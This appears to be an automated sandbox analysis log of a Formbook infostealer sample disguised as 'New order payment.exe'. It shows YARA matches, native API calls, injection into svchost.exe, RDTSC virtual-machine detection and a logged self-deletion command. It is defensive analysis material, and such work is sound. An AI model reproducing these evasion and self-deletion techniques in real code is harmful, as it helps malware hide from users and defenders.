          Source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_004047D3
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_004061D4
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_73223070
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_732230BA
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0041D0F5
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0041C0FC
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0041B8B6
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0041C985
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0041C3AF
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00408C6B
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00408C70
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0041BD45
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0041A6B6
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099B090
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A520A8
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B20A0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A528EC
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A5E824
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41002
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA830
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098F900
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A4120
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A522AE
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A3FA2B
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BEBB0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BABD8
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4DBD2
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A403DA
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A52B28
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AAB40
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099841F
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4D466
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B2581
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A525DD
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099D5E0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A52D07
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00980D20
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A51D55
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A52EF7
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A6E30
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4D616
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A51FF1
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A5DFCE
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_00401030
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041D0F5
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041C0FC
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041B8B6
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041C985
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041C3AF
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_00408C6B
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_00408C70
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041BD45
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_00402D90
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041A6B6
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_00402FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0385EBB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E03DA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038EDBD2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0385ABD8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038D23E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F2B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384AB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F22AE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038DFA2B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0382F900
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03844120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0383B090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F20A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F28EC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E1002
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038FE824
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038FDFCE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F1FF1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F2EF7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038ED616
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03846E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03852581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F25DD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0383D5E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F2D07
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03820D20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F1D55
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0383841F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038ED466
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DAD0F5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DAB8B6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DAC985
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DAA6B6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02D92FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02D98C70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02D98C6B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02D92D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DABD45
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0382B150 appears 107 times
          Source: C:\Users\user\Desktop\New order payment.exeCode function: String function: 0098B150 appears 87 times
          Source: C:\Users\user\Desktop\New order payment.exeCode function: String function: 0041A380 appears 38 times
          Source: C:\Users\user\Desktop\New order payment.exeCode function: String function: 0041A4B0 appears 38 times
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_004185D0 NtCreateFile,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00418680 NtReadFile,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00418700 NtClose,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_004187B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_004185CA NtCreateFile,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0041867A NtReadFile,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_004186FB NtClose,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009CB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009CA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009CAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9560 NtWriteFile,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009CA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009CA770 NtOpenThread,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_004185D0 NtCreateFile,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_00418680 NtReadFile,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_00418700 NtClose,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_004187B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_004185CA NtCreateFile,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041867A NtReadFile,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_004186FB NtClose,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038696D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038695D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0386A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038699D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038698A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038698F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0386B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038697A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0386A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0386A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038695F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0386AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869560 NtWriteFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DA8680 NtReadFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DA87B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DA8700 NtClose,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DA85D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DA86FB NtClose,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DA867A NtReadFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DA85CA NtCreateFile,
          Source: New order payment.exe, 00000000.00000003.238846897.000000000F176000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs New order payment.exe
          Source: New order payment.exe, 00000001.00000002.301292454.00000000026EB000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamesvchost.exej% vs New order payment.exe
          Source: New order payment.exe, 00000001.00000003.244188608.0000000000746000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs New order payment.exe
          Source: C:\Users\user\Desktop\New order payment.exeFile read: C:\Users\user\Desktop\New order payment.exeJump to behavior
          Source: New order payment.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\New order payment.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\New order payment.exe 'C:\Users\user\Desktop\New order payment.exe'
          Source: C:\Users\user\Desktop\New order payment.exeProcess created: C:\Users\user\Desktop\New order payment.exe 'C:\Users\user\Desktop\New order payment.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\New order payment.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\New order payment.exeProcess created: C:\Users\user\Desktop\New order payment.exe 'C:\Users\user\Desktop\New order payment.exe'
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\New order payment.exe'
          Source: C:\Users\user\Desktop\New order payment.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\New order payment.exeFile created: C:\Users\user\AppData\Local\Temp\nseE55E.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/2@13/7
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\New order payment.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: New order payment.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Binary string: wntdll.pdbUGP source: New order payment.exe, 00000000.00000003.242757682.000000000F1F0000.00000004.00000001.sdmp, New order payment.exe, 00000001.00000003.244051355.0000000000630000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.503827179.000000000391F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: New order payment.exe, svchost.exe
          Source: Binary string: svchost.pdb source: New order payment.exe, 00000001.00000002.301223099.00000000026E0000.00000040.00020000.sdmp
          Source: Binary string: svchost.pdbUGP source: New order payment.exe, 00000001.00000002.301223099.00000000026E0000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0041B87C push eax; ret
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0041B812 push eax; ret
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0041B81B push eax; ret
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0041C951 push FFFFFFA3h; ret
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00404F18 push edi; retf
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0041B7C5 push eax; ret
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009DD0D1 push ecx; ret
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041B87C push eax; ret
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041B812 push eax; ret
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041B81B push eax; ret
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041C951 push FFFFFFA3h; ret
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_00404F18 push edi; retf
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041B7C5 push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0387D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DAB87C push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DAB81B push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DAB812 push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DAC951 push FFFFFFA3h; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DAB7C5 push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02D94F18 push edi; retf
          Source: C:\Users\user\Desktop\New order payment.exeFile created: C:\Users\user\AppData\Local\Temp\nspE59E.tmp\fsfowpfjd.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: /c del 'C:\Users\user\Desktop\New order payment.exe'
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: /c del 'C:\Users\user\Desktop\New order payment.exe'
          Source: C:\Users\user\Desktop\New order payment.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\New order payment.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\New order payment.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000002D98604 second address: 0000000002D9860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000002D9898E second address: 0000000002D98994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 6456Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\SysWOW64\svchost.exe TID: 6316Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\New order payment.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_00402671 FindFirstFileA,
          Source: explorer.exe, 00000004.00000000.254567298.00000000089B5000.00000004.00000001.sdmpBinary or memory string: Prod_VMware_SATA?6
          Source: explorer.exe, 00000004.00000000.254493114.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.248427538.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: New order payment.exe, 00000000.00000002.244218595.0000000000776000.00000004.00000020.sdmpBinary or memory string: \divorces\tryout\marmalade.bmpjylqawoozfsSOFTWARE\roscoepduiiqsjbwqemuykqfwrylxmvbggeyuzsvpgz21176
          Source: explorer.exe, 00000004.00000000.280451175.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
